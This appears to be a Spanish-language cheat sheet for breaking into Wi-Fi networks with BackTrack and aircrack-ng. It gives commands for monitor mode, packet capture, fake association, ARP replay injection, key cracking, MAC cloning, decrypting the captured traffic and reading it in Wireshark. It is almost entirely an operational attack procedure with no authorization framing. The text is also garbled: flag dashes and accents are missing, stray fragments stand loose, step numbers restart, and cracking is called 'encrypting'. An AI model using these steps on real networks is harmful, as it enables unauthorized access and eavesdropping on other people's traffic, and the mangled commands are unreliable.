Escolar Documentos
Profissional Documentos
Cultura Documentos
Cambiar orden de booteo (Bootear con DVD): Start Backtrack in text mode lspci (Lista los chips de las tarjetas conectadas) ctrl + alt + f2 (consola) iwconfig muestra las tarjetas que estn instaladas) startx (consola grafica) Abrir Shell: 1) Iniciar la tarjeta en modo monitor: airmon-ng start wlan0 2) Reconocer el entorno inalmbrico: airodump-ng wlan0 (Muestra las redes) (Parar un proceso con Ctrl + C) 3) Capturar paquetes de datos: Nueva Shell: Airodump-ng c canal b mac_ap w nombre_archivo wlan0 4) Asociacin falsa (cuando no hay clientes) aireplay-ng -1 0 w SSID del AP A Mac del AP H Mac falsa wlan0 5) Inyeccin de trfico: Nueva Shell: aireplay-ng -3 b Mac AP h Mac del Cliente wlan0 x 300
64b
10 caracteres 40000
6) Encriptar la clave: aircrack-ng ruta del archivo (Arrastrar del lugar donde est ubicado el archivo *.cap) 7) Decodificar los paquetes: airdecap-ng w clave encontrada anteriormente ruta completa de archivo Nota que se genera un nuevo archivo captura-01-dec.cap (descifrada) 8) Analizar el trafico capturado: wireshark ruta del nuevo archivo Filter: DNS Reboot Poweroff (apagar)
Luego autentificar en el sistema operativo. Tener en cuenta que si la red es abierta o compartida. ndice de clave avanzado Cambiar mac (clonar)
aireplay-ng -1 0 e SSID a MAC_AP h Mac_Cliente wlan0 5) Busca la clave: aircrack-ng w ruta_del_archivo b Mac_Ap ruta del hankshake